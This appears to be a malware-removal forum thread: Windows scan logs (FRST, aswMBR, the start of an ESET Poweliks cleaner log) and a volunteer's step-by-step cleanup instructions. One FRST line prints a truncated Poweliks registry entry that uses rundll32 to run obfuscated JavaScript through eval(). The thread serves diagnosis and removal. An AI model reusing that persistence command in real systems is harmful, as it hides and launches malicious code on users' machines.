TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.4 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.5.5109a - TOSHIBA CORPORATION)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}) (Version: 1.7.21.64 - TOSHIBA Corporation)
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.1.2001 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.12 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.2.8 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\{119826A8-4EF6-4BE5-A88B-D2D81FA7CEE2}) (Version: 2.00.0007 - TOSHIBA)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.6.1.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}) (Version: 2.0.3.3 - TOSHIBA Corporation)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.7 - TOSHIBA)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-4159919823-1585328292-427241361-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

15-10-2014 22:40:03 Scheduled Checkpoint
18-10-2014 09:17:10 Windows Update
27-10-2014 12:28:33 Scheduled Checkpoint
07-11-2014 21:21:58 Cleaner (Spybot - Search & Destroy 2.4, administrator privileges
07-11-2014 21:22:53 Cleaner (Spybot - Search & Destroy 2.4, administrator privileges
09-11-2014 01:30:06 Cleaner (Spybot - Search & Destroy 2.4, administrator privileges

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-11-09 03:24 - 00450713 ____R C:\windows\system32\Drivers\etc\hosts
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com

There are 1000 more lines.


==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0E5F54C9-CFEA-4CC2-B7F9-D5D4A7C9B533} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-24] (Google Inc.)
Task: {1207E1DC-029C-4DA8-B4C7-E4D60B53425D} - System32\Tasks\PC Checkup 3 Weekly Scan => C:\Program Files (x86)\PC Checkup\NLAppLauncher.exe [2013-10-20] (Symantec Corporation)
Task: {2C3E012D-D285-434B-8D2A-F5CF99947A20} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {55D65B40-D0A9-4CB8-8219-318E71A4DD9A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-08-21] (Piriform Ltd)
Task: {5A79FF65-95EE-42F4-9001-0B89C57B3CD2} - System32\Tasks\HPCustParticipation HP Deskjet 2540 series => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPCustPartic.exe [2013-08-13] (Hewlett-Packard Co.)
Task: {70914200-9CA5-439D-BBC7-459EDAEBACD0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-24] (Google Inc.)
Task: {8928A8C8-A7B7-4366-9CBA-98982B8B795F} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-07-21] (AVAST Software)
Task: {C0850D46-6233-4B76-B5AE-2930200C07EF} - System32\Tasks\HPCustParticipation HP Deskjet 1050 J410 series => C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\HPCustPartic.exe [2010-11-16] (Hewlett-Packard Co.)
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Loaded Modules (whitelisted) =============

2011-12-08 14:13 - 2010-09-09 20:26 - 00162824 _____ () C:\Windows\System32\GFNEXSrv.exe
2010-11-18 20:18 - 2010-11-18 20:18 - 11190784 _____ () C:\Program Files\Toshiba\FlashCards\BlackPng.dll
2010-12-15 18:19 - 2010-12-15 18:19 - 00124320 _____ () C:\Program Files\Toshiba\TECO\MUIHelp.dll
2014-06-14 20:01 - 2014-06-14 19:59 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\loggingserver.exe
2011-10-13 20:01 - 2011-10-13 20:01 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-03-22 13:17 - 2011-03-22 13:17 - 00016384 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2011-06-10 00:09 - 2011-06-10 00:09 - 00079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2014-07-21 09:45 - 2014-07-21 09:45 - 00301152 _____ () C:\Program Files\AVAST Software\Avast\aswProperty.dll
2014-11-09 21:35 - 2014-11-09 21:35 - 02900992 _____ () C:\Program Files\AVAST Software\Avast\defs\14110901\algo.dll
2014-11-10 17:05 - 2014-11-10 17:05 - 02900992 _____ () C:\Program Files\AVAST Software\Avast\defs\14111001\algo.dll
2014-11-06 20:49 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-06 20:49 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-06 20:49 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-06 20:49 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-06 20:49 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2014-07-21 09:45 - 2014-07-21 09:45 - 19329904 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2014-06-14 20:01 - 2014-06-14 19:59 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\log4cplusU.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:07BF512B
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:15734396

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-4159919823-1585328292-427241361-500 - Administrator - Disabled)
Guest (S-1-5-21-4159919823-1585328292-427241361-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4159919823-1585328292-427241361-1002 - Limited - Enabled)
My Computer (S-1-5-21-4159919823-1585328292-427241361-1000 - Administrator - Enabled) => C:\Users\My Computer

==================== Faulty Device Manager Devices =============

Name: avast! Firewall NDIS Filter Miniport
Description: avast! Firewall NDIS Filter Miniport
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ALWIL Software
Service: aswNdis
Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19)
Resolution: A registry problem was detected.
This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options:
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver.

Name: avast! Firewall NDIS Filter Miniport
Description: avast! Firewall NDIS Filter Miniport
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ALWIL Software
Service: aswNdis
Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19)
Resolution: A registry problem was detected.
This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options:
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/09/2014 11:08:42 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
at System.Timers.Timer.set_Enabled(Boolean value)
at SnappCloud.ActivationReminder.AraClient.PostInit()
at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (11/09/2014 11:08:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/09/2014 09:34:31 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
at System.Timers.Timer.set_Enabled(Boolean value)
at SnappCloud.ActivationReminder.AraClient.PostInit()
at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (11/09/2014 09:34:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/09/2014 03:13:12 AM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
at System.Timers.Timer.set_Enabled(Boolean value)
at SnappCloud.ActivationReminder.AraClient.PostInit()
at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (11/09/2014 03:12:54 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/09/2014 02:09:59 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/09/2014 02:09:39 AM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
at System.Timers.Timer.set_Enabled(Boolean value)
at SnappCloud.ActivationReminder.AraClient.PostInit()
at SnappCloud.ActivationReminder.Program.Main(String[] args)


System errors:
=============
Error: (11/10/2014 05:54:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (11/09/2014 11:09:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)

Error: (11/09/2014 11:08:58 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/09/2014 11:08:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (11/09/2014 11:07:46 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 11:05:59 PM on ‎11/‎9/‎2014 was unexpected.

Error: (11/09/2014 10:36:09 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (11/09/2014 09:35:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)

Error: (11/09/2014 09:34:41 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/09/2014 09:34:32 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (11/09/2014 09:33:23 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 1:02:37 PM on ‎11/‎9/‎2014 was unexpected.


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: AMD A6-3420M APU with Radeon(tm) HD Graphics
Percentage of memory in use: 45%
Total physical RAM: 3562.12 MB
Available physical RAM: 1924.16 MB
Total Pagefile: 7122.41 MB
Available Pagefile: 4882.68 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (TI106319W0D) (Fixed) (Total:579.96 GB) (Free:511 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: D6FA2AD7)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=580 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=14.7 GB) - (Type=17)

==================== End Of Log ============================



aswMBR version 1.0.1.2201 Copyright(c) 2014 AVAST Software
Run date: 2014-11-10 18:38:37
-----------------------------
18:38:37.311 OS Version: Windows x64 6.1.7601 Service Pack 1
18:38:37.311 Number of processors: 4 586 0x100
18:38:37.312 ComputerName: MYCOMPUTER-PC UserName: My Computer
18:38:38.577 Initialize success
18:38:38.623 VM: initialized successfully
18:38:38.633 VM: Amd CPU supported virtualized
18:38:41.999 AVAST engine defs: 14111001
18:39:48.841 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-4
18:39:48.844 Disk 0 Vendor: TOSHIBA_MK6475GSX GT001M Size: 610480MB BusType: 11
18:39:49.049 Disk 0 MBR read successfully
18:39:49.053 Disk 0 MBR scan
18:39:49.058 Disk 0 Windows VISTA default MBR code
18:39:49.073 Disk 0 Partition 1 80 (A) 27 Hidden NTFS WinRE NTFS 1500 MB offset 2048
18:39:49.081 Disk 0 default boot code
18:39:49.104 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 593880 MB offset 3074048
18:39:49.140 Disk 0 Partition 3 00 17 Hidd HPFS/NTFS NTFS 15099 MB offset 1219340288
18:39:49.383 Disk 0 scanning C:\windows\system32\drivers
18:40:08.564 Service scanning
18:40:36.082 Modules scanning
18:40:36.093 Disk 0 trace - called modules:
18:40:36.155 ntoskrnl.exe CLASSPNP.SYS disk.sys ataport.SYS PCIIDEX.SYS hal.dll msahci.sys
18:40:36.161 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004d60060]
18:40:36.166 3 CLASSPNP.SYS[fffff880018e043f] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP2T0L0-4[0xfffffa8004b011f0]
18:40:37.324 AVAST engine scan C:\windows
18:40:51.728 AVAST engine scan C:\windows\system32
18:43:41.788 AVAST engine scan C:\windows\system32\drivers
18:43:53.533 AVAST engine scan C:\Users\My Computer
18:51:57.493 AVAST engine scan C:\ProgramData
18:56:41.835 File: C:\ProgramData\Windows Genuine Advantage\{C1160376-8565-4F9E-9B23-2ABBDC246D94}\api-ms-win-system-msvcp60-l1-1-0.dll **INFECTED** Win32:Dropper-gen [Drp]
18:56:42.232 Disk 0 statistics 3985928/0/0 @ 2.33 MB/s
18:56:42.242 Scan finished successfully
18:56:57.938 Disk 0 MBR has been saved successfully to "C:\Users\My Computer\Desktop\MBR.dat"
18:56:57.945 The log file has been saved successfully to "C:\Users\My Computer\Desktop\aswMBR.txt"

Hi wingeater,

My name is OCD. I would be more than happy to take a look at your log and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:

I will be working on your Malware issues, this may or may not, solve other issues you have with your machine.
The fixes are specific to your problem and should only be used for the issues on this machine.
Please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear.
It's often worth reading through these instructions and printing them for ease of reference.
If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.
Please reply to this thread. Do not start a new topic.
Copy and Paste logs directly into the reply window. DO NOT attach the logs unless specifically instructed to do so.
IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.

DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your Operating System and losing all your programs and data.

Please stay with this topic until I let you know that your system appears to be "All Clear"

Important: All tools MUST be run from the Desktop.

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) ESET Poweliks Cleaner

Please download ESET Poweliks Cleaner (http://download.eset.com/special/ESETPoweliksCleaner.exe) to your desktop


Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

Read the terms of the End-user license agreement and click Agree (if you agree to them)
The tool will run automatically. If the cleaner finds a Poweliks infection, press the "Y" key on your keyboard to remove it.
If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed.
Press any key to exit the tool and reboot your PC.
The tool will produce a log in the same directory the tool was run from.
Please copy and paste the log in your next reply

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) AdwCleaner v3: Scan & Clean (http://www.bleepingcomputer.com/download/adwcleaner/)

Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

Click on the Scan button.
AdwCleaner will begin to scan your computer like it did before.
After the scan has finished...
Click on the Clean button.
Press OK when asked to close all programs and follow the onscreen prompts.
Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
After rebooting, a log file report (AdwCleaner[S0].txt) will open automatically.
Copy and paste the contents of that log file in your next reply.
A copy of that log file will also be saved in the C:\AdwCleaner folder.

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) Junkware Removal Tool

Download Junkware Removal Tool (http://thisisudax.org/downloads/JRT.exe) to your desktop.

Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

Shut down your protection software now to avoid potential conflicts.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) Re-run Farbar Recovery Scan Tool it should be on your desktop.


Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.

=========================

In your next post please provide the following:

Poweliks log
AdwCleaner[S0].txt
JRT.txt
new FRST.txt

Thanks for the help and quick response!


[2014.11.10 19:31:16.030] - Begin
[2014.11.10 19:31:16.030] -
[2014.11.10 19:31:16.030] - ....................................
[2014.11.10 19:31:16.030] - ..::::::::::::::::::....................
[2014.11.10 19:31:16.030] - .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT.. Win32/Poweliks
[2014.11.10 19:31:16.030] - .::EE::::EE:SS:::::::.EE....EE....TT...... Version: 1.0.0.1
[2014.11.10 19:31:16.046] - .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT...... Built: Oct 15 2014
[2014.11.10 19:31:16.046] - .::EE:::::::::::::SS:.EE..........TT......
[2014.11.10 19:31:16.046] - .::EEEEEE:::SSSSSS::..EEEEEE.....TT..... Copyright (c) ESET, spol. s r.o.
[2014.11.10 19:31:16.046] - ..::::::::::::::::::.................... 1992-2013. All rights reserved.
[2014.11.10 19:31:16.046] - ....................................
[2014.11.10 19:31:16.046] -
[2014.11.10 19:31:16.046] - --------------------------------------------------------------------------------
[2014.11.10 19:31:16.046] -
[2014.11.10 19:31:16.046] - INFO: OS: 6.1.7601 SP1
[2014.11.10 19:31:16.046] - INFO: Product Type: Workstation
[2014.11.10 19:31:16.046] - INFO: WoW64: True
[2014.11.10 19:31:16.046] - INFO: Machine guid: A13B1882-6AC3-49A8-9D1B-E624E863CE9F
[2014.11.10 19:31:16.046] -
[2014.11.10 19:31:16.108] - INFO: Scanning for system infection...
[2014.11.10 19:31:16.108] - --------------------------------------------------------------------------------
[2014.11.10 19:31:16.108] -
[2014.11.10 19:31:16.108] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.10 19:31:16.108] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.10 19:31:16.108] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.10 19:31:16.124] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.10 19:31:16.124] - INFO: Processing classes...
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0005-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.124] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0006-ABCDEFFEDCBA}]
